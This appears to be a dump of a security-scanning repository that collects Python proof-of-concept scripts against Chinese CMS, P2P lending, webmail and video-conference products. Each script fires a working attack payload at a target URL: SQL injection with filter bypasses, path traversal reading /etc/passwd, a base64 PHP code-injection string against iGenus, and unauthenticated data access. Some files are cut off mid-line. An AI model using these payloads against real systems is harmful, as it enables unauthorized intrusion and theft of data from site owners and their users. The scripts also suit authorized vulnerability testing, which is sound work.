/pocs/cms/acsoft/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/acsoft/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/autoset/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/autoset/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/cmseasy/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/cmseasy/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/dedecms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/dedecms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/dedecms/dedecms_download_redirect.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms download.php重定向漏洞
5 | referer: http://skyhome.cn/dedecms/357.html
6 | author: Lucifer
7 | description: 在dedecms 5.7sp1的/plus/download.php中67行存在的代码,即接收参数后未进行域名的判断就进行了跳转。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class dedecms_download_redirect_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/plus/download.php?open=1&link=aHR0cHM6Ly93d3cuYmFpZHUuY29t"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"www.baidu.com" in req.text:
27 | cprint("[+]存在dedecms download.php重定向漏洞...(低危)\tpayload: "+vulnurl, "blue")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = dedecms_download_redirect_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/dedecms/dedecms_error_trace_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms trace爆路径漏洞
5 | referer: http://0daysec.blog.51cto.com/9327043/1571372
6 | author: Lucifer
7 | description: 访问mysql_error_trace.inc,mysql trace报错路径泄露。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class dedecms_error_trace_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/data/mysql_error_trace.inc"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = dedecms_error_trace_disclosure_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/digital_campus/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/digital_campus/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/discuz/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/discuz/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/discuz/discuz_focus_flashxss.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: discuz X3 focus.swf flashxss漏洞
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件中focus.swf存在flashxss。
8 | '''
9 | import sys
10 | import urllib
11 | import hashlib
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
16 | class discuz_focus_flashxss_BaseVerify:
17 | def __init__(self, url):
18 | self.url = url
19 |
20 | def run(self):
21 | headers = {
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 | }
24 | flash_md5 = "c16a7c6143f098472e52dd13de85527f"
25 | payload = "/static/image/common/focus.swf"
26 | vulnurl = self.url + payload
27 | try:
28 | req = urllib.request.urlopen(vulnurl)
29 | data = req.read()
30 | md5_value = hashlib.md5(data).hexdigest()
31 | if md5_value in flash_md5:
32 | cprint("[+]存在discuz X3 focus.swf flashxss漏洞...(高危)\tpayload: "+vulnurl, "red")
33 |
34 | except:
35 | cprint("[-] "+__file__+"====>连接超时", "cyan")
36 |
37 | if __name__ == "__main__":
38 | warnings.filterwarnings("ignore")
39 | testVuln = discuz_focus_flashxss_BaseVerify(sys.argv[1])
40 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/discuz/discuz_plugin_ques_sqli.py:
--------------------------------------------------------------------------------
1 |
2 | #!/usr/bin/env python
3 | # -*- coding: utf-8 -*-
4 | '''
5 | name: discuz问卷调查参数orderby注入漏洞
6 | referer: http://0day5.com/archives/3184/
7 | author: Lucifer
8 | description: 文件plugin.php中,参数orderby存在SQL注入。
9 | '''
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class discuz_plugin_ques_sqli_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline/**/And/**/1=(UpdateXml(1,ConCat(0x7e,Md5(1234)),1))--"
24 | vulnurl = self.url + payload
25 | try:
26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
27 | if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text:
28 | cprint("[+]存在discuz问卷调查参数orderby注入漏洞...(高危)\tpayload: "+vulnurl, "red")
29 |
30 | except:
31 | cprint("[-] "+__file__+"====>连接超时", "cyan")
32 |
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = discuz_plugin_ques_sqli_BaseVerify(sys.argv[1])
36 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/diyou/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/diyou/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/diyou/dyp2p_latesindex_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 帝友P2P借贷系统无需登录SQL注入漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2011-150130
6 | author: Lucifer
7 | description: 帝友P2P借贷系统/lates/index.html逾期黑名单搜索处过滤了select和空格,利用/**/和双写select可以绕过
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class dyp2p_latesindex_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/lates/index.html?username=123%27/**/and/**/(seleselectct/**/1/**/from/**/(selselectect/**/count(*),concat(0x7e,MD5(%271234%27),0x7e,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
25 | cprint("[+]存在帝友P2P借贷系统 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
26 |
27 | except:
28 | cprint("[-] "+__file__+"====>连接超时", "cyan")
29 |
30 | if __name__ == "__main__":
31 | warnings.filterwarnings("ignore")
32 | testVuln = dyp2p_latesindex_sqli_BaseVerify(sys.argv[1])
33 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/diyou/dyp2p_url_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 帝友P2P借贷系统任意文件读取漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-033114
6 | author: Lucifer
7 | description: 帝友P2P3.0以前存在任意文件读取漏洞,可读取数据库配置文件
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class dyp2p_url_fileread_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/index.php?plugins&q=imgurl&url=QGltZ3VybEAvY29yZS9jb21tb24uaW5jLnBocA=="
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"common.inc.php" in req.text:
25 | cprint("[+]存在帝友P2P借贷系统任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
26 |
27 | except:
28 | cprint("[-] "+__file__+"====>连接超时", "cyan")
29 |
30 | if __name__ == "__main__":
31 | warnings.filterwarnings("ignore")
32 | testVuln = dyp2p_url_fileread_BaseVerify(sys.argv[1])
33 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/dreamgallery/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/dreamgallery/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/dreamgallery/dreamgallery_album_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dreamgallery album.php SQL注入
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件album.php中,参数id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class dreamgallery_album_id_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/dream/album.php?id=-1+/*!12345union*/+/*!12345select*/+1,group_concat(version(),0x3a,md5(1234),0x3a,database()),3,4,5,6,7,8,9,10--+"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在dreamgallery album.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = dreamgallery_album_id_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/dswjcms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/dswjcms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/ecscms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/ecscms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/ecscms/ecscms_MoreIndex_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 易创思ECScms MoreIndex SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-088844
6 | author: Lucifer
7 | description: 文件MoreIndex.aspx中,参数kw存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class ecscms_MoreIndex_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/MoreIndex.aspx?pkId=0&kw=a%27%20AnD%201=(SeLeCt%20Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27)))--&st=2&t=1"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在易创思ECScms MoreIndex SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = ecscms_MoreIndex_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/ecshop/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/ecshop/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/esccms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/esccms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/esccms/esccms_selectunitmember_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 易创思教育建站系统未授权访问可查看所有注册用户
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-086704
6 | author: Lucifer
7 | description: 文件selectunitmember.aspx未授权访问。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class esccms_selectunitmember_unauth_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/operationmanage/selectunitmember.aspx"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"doPostBack" in req.text and r"gvUnitMember" in req.text:
27 | cprint("[+]存在易创思教育建站系统未授权漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = esccms_selectunitmember_unauth_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/etmdcp/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/etmdcp/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/eyou/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/eyou/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/eyou/eyou_resetpw.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 亿邮邮件系统重置密码问题暴力破解
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0162892
6 | author: Lucifer
7 | description: 亿邮邮件系统找回密码处,如果用户设置问题密码过于简单可被暴力破解。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class eyou_resetpw_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/?q=resetpw"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if req.status_code == 200 and r"pw_intensity" in req.text:
25 | cprint("[+]存在eyou邮件系统重置密码问题页面...(敏感信息)\tpayload: "+vulnurl, "green")
26 |
27 | except:
28 | cprint("[-] "+__file__+"====>连接超时", "cyan")
29 |
30 | if __name__ == "__main__":
31 | warnings.filterwarnings("ignore")
32 | testVuln = eyou_resetpw_BaseVerify(sys.argv[1])
33 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/eyou/eyou_user_kw_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 亿邮mail5 user 参数kw SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-074260
6 | author: Lucifer
7 | description: 文件user中,参数kw存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class eyou_user_kw_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/user/?q=help&type=search&page=1&kw=-1%22)UnIoN/**/AlL/**/SeLeCt/**/1,2,3,Md5(1234),5,6,7%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在亿邮mail5 user 参数kw SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = eyou_user_kw_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/fastmeeting/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/fastmeeting/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/fastmeeting/fastmeeting_download_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 好视通视频会议系统(fastmeeting)任意文件遍历
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0143719
6 | author: Lucifer
7 | description: 文件/dbbackup/adminMgr/download.jsp中,参数fileName存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class fastmeeting_download_filedownload_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/dbbackup/adminMgr/download.jsp?fileName=../WEB-INF/web.xml"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.headers["Content-Type"] == "application/xml":
27 | cprint("[+]存在好视通视频会议系统(fastmeeting)任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = fastmeeting_download_filedownload_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/finecms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/finecms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/foosun/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/foosun/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/foosun/foosun_City_ajax_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: Dotnetcms(风讯cms)SQL注入漏洞
5 | referer: https://silic.wiki/0day:%E9%A3%8E%E8%BF%85_dotnetcms_2.0-1.0_sql_injection
6 | author: Lucifer
7 | description: 文件City_ajax.aspx中,参数CityId存在SQL注入。
8 | '''
9 | import sys
10 | import time
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class foosun_City_ajax_sqli_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/user/City_ajax.aspx?CityId=1%27WAiTFoR%20DeLAy%20%270:0:6%27--"
24 | vulnurl = self.url + payload
25 | start_time = time.time()
26 | try:
27 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
28 | if time.time() - start_time >= 6:
29 | cprint("[+]存在Dotnetcms(风讯cms)SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>连接超时", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = foosun_City_ajax_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/fsmcms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/fsmcms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/fsmcms/fsmcms_setup_reinstall.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: FSMCMS网站重装漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-043380
6 | author: Lucifer
7 | description: 东方文辉网站群内容管理系统FSMCMS网站重装漏洞,网站安装程序在安装之后默认没有删除,也没有限制,可以很容易的恶意把网站重装了。
8 | '''
9 | import sys
10 | import warnings
11 | import requests
12 | from termcolor import cprint
13 |
14 | class fsmcms_setup_reinstall_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/setup/index.jsp"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |
27 | if r'连接超时", "cyan")
32 |
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = fsmcms_setup_reinstall_BaseVerify(sys.argv[1])
36 | testVuln.run()
37 |
--------------------------------------------------------------------------------
/pocs/cms/gobetters/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/gobetters/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/gowinsoft_jw/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/gowinsoft_jw/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/gpower/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/gpower/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/gpower/gpower_users_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 通元建站系统用户名泄露漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-059578
6 | author: Lucifer
7 | description: 未做权限过滤,可以显示所有用户的用户名
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class gpower_users_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/cms/system/selectUsers.jsp"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"totalProperty" in req.text:
25 | cprint("[+]存在通元内容管理系统用户名泄露...(敏感信息)\tpayload: "+vulnurl, "green")
26 |
27 | except:
28 | cprint("[-] "+__file__+"====>连接超时", "cyan")
29 |
30 | if __name__ == "__main__":
31 | warnings.filterwarnings("ignore")
32 | testVuln = gpower_users_disclosure_BaseVerify(sys.argv[1])
33 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/hanweb/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/hanweb/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/hanweb/hanweb_downfile_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 大汉downfile.jsp 任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-092339
6 | author: Lucifer
7 | description: 文件/vc/vc/columncount/downfile.jsp中,参数filename存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class hanweb_downfile_filedownload_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/vc/vc/columncount/downfile.jsp?savename=a.txt&filename=../../../../../../../../etc/passwd"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"root:" in req.text and r"/bin/bash" in req.text:
27 | cprint("[+]存在大汉downfile.jsp 任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = hanweb_downfile_filedownload_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/iGenus/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/iGenus/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/iGenus/igenus_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: iGenus邮件系统一处无需登录的任意代码执行
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0156126
6 | author: Lucifer
7 | description: /home/webmail/igenus/include/login_inc.php base64编码未验证可写入shell
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class igenus_code_exec_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/index.php?selTpl=YWF8YWFhJzsKcGhwaW5mbygpOyM="
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"Configuration File (php.ini) Path" in req.text:
27 | cprint("[+]存在igenus命令执行漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = igenus_code_exec_BaseVerify(sys.argv[1])
35 | testVuln.run()
36 |
--------------------------------------------------------------------------------
/pocs/cms/iGenus/igenus_login_Lang_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: iGenus邮箱系统login.php 参数Lang任意文件读取
5 | referer: http://www.wooyun.org/bugs/WooYun-2015-136712
6 | author: Lucifer
7 | description: Lang存在遍历,%00截断。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class igenus_login_Lang_fileread_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
